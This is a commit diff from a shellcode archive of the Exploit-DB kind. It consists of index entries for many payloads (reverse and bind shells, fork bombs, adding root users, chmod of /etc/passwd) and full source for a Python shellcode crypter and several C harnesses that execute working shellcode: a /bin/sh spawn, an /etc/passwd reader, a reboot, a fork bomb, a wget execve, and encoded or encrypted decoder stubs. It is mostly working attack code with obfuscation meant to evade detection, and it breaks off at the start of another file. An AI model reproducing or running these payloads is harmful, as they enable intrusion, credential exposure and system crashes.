784 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
785 41581 shellcodes/windows_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) Windows/x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
786 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
787 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
788 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
804 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso shellcode irix
805 43520 shellcodes/arm/43520.c Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) 2017-03-31 dummys shellcode arm
806 43530 shellcodes/arm/43530.c Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) 2015-03-02 Osanda Malith Jayathissa shellcode arm
807 43531 shellcodes/arm/43531.c Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes) Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
808 43532 shellcodes/arm/43532.c Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
809 43533 shellcodes/arm/43533.c Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes) 2013-09-04 gunslinger_ shellcode arm
810 43534 shellcodes/arm/43534.c Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes) 2010-08-31 Jonathan Salwan shellcode arm
815 43545 shellcodes/linux_sparc/43545.c Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes) 2009-01-01 anathema shellcode linux_sparc
816 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
817 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
818 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes) Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
819 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
820 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
821 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
822 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
823 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
824 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
825 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
826 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
827 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
828 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
829 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
830 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
831 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
832 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
833 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
834 43734 shellcodes/linux_x86/43734.c Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
835 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
836 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
837 41750 shellcodes/linux_x86-64/41750.txt Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
838 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4) 2017-03-29 WangYihang shellcode linux_x86
839 41827 shellcodes/windows_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) Windows/x86-64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
840 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
841 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter Shellcode (18 bytes) Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
842 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
843 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
844 42016 shellcodes/windows/42016.asm Windows x86/x64 - cmd.exe Shellcode (718 bytes) Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
845 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
846 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
847 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
848 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
849 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
850 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
851 42428 shellcodes/linux_x86/42428.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
852 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
853 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
854 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
855 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
856 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
857 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
858 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) Linux/x86-64 - mkdir(evil) Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
859 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
860 42992 shellcodes/windows_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) Windows/x86-64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
861 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86

0
shellcodes/windows_x86/14014.pl → shellcodes/generator/14014.pl
View file

154
shellcodes/generator/43741.py Executable file
View file

@ -0,0 +1,154 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Uzumaki Shellcode Crypter - Python Language
# Copyright (C) 2013 Geyslan G. Bem, Hacking bits
#
# http://hackingbits.com
# geyslan@gmail.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
uzumaki_crypter
* uses the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
# ./uzumaki_crypter.py -h
# ./uzumaki_crypter.py -a 03 -x f2 -s $'\x31\xc9\xf7\xe1...\x80'
'''
import sys
import getopt
import string
def usage ():
usage = """
-a --add Byte to be used with bitwise ADD (one byte in hex format)
Default is 01
Eg. -a 2f
--add 1f
-x --xor Byte to be used with bitwise XOR (one byte in hex format)
Default is cc
Eg. -x f2
--xor aa
-s --shellcode The shellcode to be crypted with the uzumaki cipher
Eg. -s $'\\xcd\\x80'
--shellcode `printf "\\xcc\\x90"`
-h --help This help
"""
print(usage)
def main():
addByte = "01"
xorByte = "cc"
shellcode = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "ha:x:s:")
except getopt.GetoptError as err:
print(err)
usage()
sys.exit()
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-a", "--add"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" ADD byte has to be in hex format. Eg. -a 3f\n")
sys.exit()
addByte = a
elif o in ("-x", "--xor"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" XOR byte has to be in hex format. Eg. -x f1\n")
sys.exit()
xorByte = a
elif o in ("-s", "--shellcode"):
shellcode = a.encode("utf_8", "surrogateescape")
if (not shellcode):
print(" Is necessary to inform a shellcode. Eg. -s $'\\xcd\\x80'\n")
sys.exit()
crypted = ""
crypted2 = ""
crypted3 = ""
crypted4 = ""
tempbyte = 0x00
for x in range(len(shellcode)):
if (x == 0):
tempbyte = shellcode[x]
else:
tempbyte = ((shellcode[x-1] ^ (shellcode[x] ^ int("0x" + xorByte, 16) )) + int("0x" + addByte, 16))
if (tempbyte > 0xff or tempbyte <= 0x00):
print(" A crypted byte value cannot be higher than 0xff or equal to 0x00. Please change the value of the option 'ADD' or/and of the option 'XOR'.\n")
sys.exit()
crypted += "\\x%02x" % tempbyte
crypted2 = crypted.replace("\\x", ",0x")[1:]
crypted3 += r"\x29\xc9\x74\x14\x5e\xb1"
crypted3 += r"\x%02x" % (len(shellcode) - 1)
crypted3 += r"\x46\x8b\x06\x83\xe8"
crypted3 += r"\x" + addByte
crypted3 += r"\x34"
crypted3 += r"\x" + xorByte
crypted3 += r"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8\xe7\xff\xff\xff"
crypted3 += crypted
crypted4 = crypted3.replace("\\x", ",0x")[1:]
crypted = '"' + crypted + '";'
crypted3 = '"'+ crypted3 + '";'
print("Uzumaki Shellcode Crypter - Swirling Everything")
print("http://hackingbits.com")
print("https://github.com/geyslan/SLAE.git")
print("License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n\n")
print("Crypted shellcode:\n")
print(crypted)
print()
print(crypted2)
print("\n\n")
print("Crypted shellcode with decrypter built-in:\n")
print(crypted3)
print()
print(crypted4)
print("\n\n")
print("Length: %d" % len(bytearray(shellcode)))
print("Length with decrypter: %d" % ((len(crypted3) - 2) / 4))
if __name__ == "__main__":
main()

2
shellcodes/linux_x86/36921.c
View file

@ -4,7 +4,7 @@
# Shellcode Author: Oleg Boytsev
# Tested on: Debian GNU/Linux 7/i686
# Shellcode Length: 58
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
# EDB Note ~ Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
global _start
section .text

32
shellcodes/linux_x86/43701.c
View file

@ -1,32 +0,0 @@
/*
Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
Date : 10 Feb 2011
Author : kernel_panik
Thanks : cOokie, agix, antrhacks
*/
/*
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f ;; hs//
push 0x6e69622f ;; nib/
mov ebx, esp
mov al, 11
int 0x80
*/
#include <stdio.h>
#include <string.h>
char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf ("Shellcode length : %d bytes\n", strlen (code));
int(*f)()=(int(*)())code;
f();
}

86
shellcodes/linux_x86/43734.c Normal file
View file

@ -0,0 +1,86 @@
/*
Insertion Decoder Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
insertion_decoder_shellcode
* decoder has 33 bytes (the final amount depends on the shellcode length plus garbage bytes)
* null-free
* decodes any pattern of garbage insertion
Eg: True Byte = X, Garbage Byte = _
_ X _ X _ ...
X _ _ X X ...
X X X _ _ ...
# gcc -m32 -fno-stack-protector -z execstack insertion_decoder_shellcode.c -o insertion_decoder_shellcode
Testing
# ./insertion_decoder_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
// Shellcode Decoder (33 bytes)
"\xeb\x1a\x5e\x8d\x3e\x31\xc9\x8b\x1c\x0e"
"\x41\x66\x81\xfb"
"\xf1\xf1" // <- End Signature
"\x74\x0f\x80\xfb"
"\x3f" // <- Garbage Byte
"\x74\xf0\x88\x1f\x47\xeb\xeb\xe8\xe1\xff"
"\xff\xff"
// Encoded shellcode (length depends of the shellcode plus garbage bytes)
"\x3f\x3f\x3f\x31\x3f\xc9\x3f\xf7\xe1\x3f"
"\xb0\x0b\x3f\x51\x68\x3f\x2f\x2f\x3f\x73"
"\x68\x3f\x68\x2f\x3f\x62\x69\x3f\x6e\x89"
"\x3f\xe3\xcd\x3f\x80\xf1\xf1";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

70
shellcodes/linux_x86/43735.c Normal file
View file

@ -0,0 +1,70 @@
/*
Tiny Execve sh Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
/*
tiny_execve_sh_shellcode
* 21 bytes
* null-free
# gcc -m32 -fno-stack-protector -z execstack tiny_execve_sh_shellcode.c -o tiny_execve_sh_shellcode
Testing
# ./tiny_execve_sh_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
"\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

74
shellcodes/linux_x86/43736.c Normal file
View file

@ -0,0 +1,74 @@
/*
Tiny Read File Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
tiny_read_file_shellcode
* 51 bytes
* null-free
* read 4096 bytes from /etc/passwd file
# gcc -m32 -fno-stack-protector -z execstack tiny_read_file_shellcode.c -o tiny_read_file_shellcode
Testing
# ./tiny_read_file_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73"
"\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f"
"\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03"
"\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92"
"\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd"
"\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

75
shellcodes/linux_x86/43737.c Normal file
View file

@ -0,0 +1,75 @@
/*
Mutated Reboot Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see &t;http://www.gnu.org/licenses/>.
*/
/*
mutated_reboot_shellcode
* 55 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_reboot_shellcode.c -o mutated_reboot_shellcode
Testing
* Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
* To work properly, you must be su!
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x29\xff\x74\x01\xe8\x83\xc7\x24\x97\xeb"
"\x01\xe1\xcd\x80\xeb\x01\xff\x6a\x29\x59"
"\xeb\x01\x01\xbb\x67\x45\x23\x01\xba\xca"
"\x9b\xc2\xff\x31\xda\x75\x01\xe7\x87\xda"
"\x8d\x41\x2f\x8d\x89\x40\x19\x12\x28\xeb"
"\x02\xe8\x01\xcd\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

70
shellcodes/linux_x86/43738.c Normal file
View file

@ -0,0 +1,70 @@
/*
Mutated Fork Bomb Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_fork_bomb_shellcode
* 15 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode
Testing
* Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xff\xeb\x01\xe8\xb2\x1d\x97\x83\xe8"
"\x1b\xcd\x80\xeb\xf1";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

78
shellcodes/linux_x86/43739.c Normal file
View file

@ -0,0 +1,78 @@
/*
Mutated Execve Wget Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_execve_wget_shellcode
* 96 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_execve_wget_shellcode.c -o mutated_execve_wget_shellcode
Testing
# ./mutated_execve_wget_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xeb\x01\xe8\x29\xdb\x74\x01\x83\xf7\xe3"
"\xbd\xf5\xff\xff\xff\xeb\x01\xe8\x68\x41"
"\x65\x45\x72\x29\xf6\x74\x01\x83\x5e\x56"
"\x81\xf6\x25\x4a\x1f\x3e\x56\xeb\x01\x33"
"\x68\x69\x73\x2e\x67\x89\x44\x24\x0c\x89"
"\xe1\x6a\x74\xeb\x01\xe3\x68\x2f\x77\x67"
"\x65\xeb\x01\x83\x68\x2f\x62\x69\x6e\xeb"
"\x01\x33\x68\x2f\x75\x73\x72\x8d\x1c\x24"
"\xeb\x01\x83\x50\x51\x53\x89\xe1\xf7\xdd"
"\x95\xeb\x01\x83\xcd\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

82
shellcodes/linux_x86/43740.c Normal file
View file

@ -0,0 +1,82 @@
/*
Uzumaki Decrypter Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
uzumaki_decrypter_shellcode
* decrypter has 29 bytes (the final amount depends on the shellcode length)
* it decrypts the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
* to encrypt the shellcode use the Uzumaki Crypter <https://github.com/geyslan/SLAE/blob/master/7th.assignment/uzumaki_crypter.py>
* null-free
# gcc -m32 -fno-stack-protector -z execstack uzumaki_decrypter_shellcode.c -o uzumaki_decrypter_shellcode
Testing
# ./uzumaki_decrypter_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
// Shellcode Decrypter
"\x29\xc9\x74\x14\x5e\xb1"
"\x14" // <- shellcode length
"\x46\x8b\x06\x83\xe8"
"\x09" // <- ADD key
"\x34"
"\x9f" // <- XOR key
"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8"
"\xe7\xff\xff\xff"
// Crypted Shellcode
"\x31\x70\xaa\x92\xd7\x2d\xce\xaf\xe1\xa8"
"\xcc\x8d\xa8\xe1\xdb\x9d\xa1\x81\xfe\xba"
"\xdb";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}

100
shellcodes/linux_x86/43742.c Normal file
View file

@ -0,0 +1,100 @@
/*
